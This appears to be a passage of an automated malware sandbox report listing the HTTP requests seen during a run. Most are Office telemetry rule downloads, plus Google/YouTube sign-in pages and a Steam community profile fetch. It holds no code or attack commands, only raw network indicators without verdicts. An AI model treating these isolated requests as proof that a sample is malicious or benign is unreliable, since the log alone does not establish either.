Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1Host: www.youtube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-267163924&timestamp=1728264202403 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
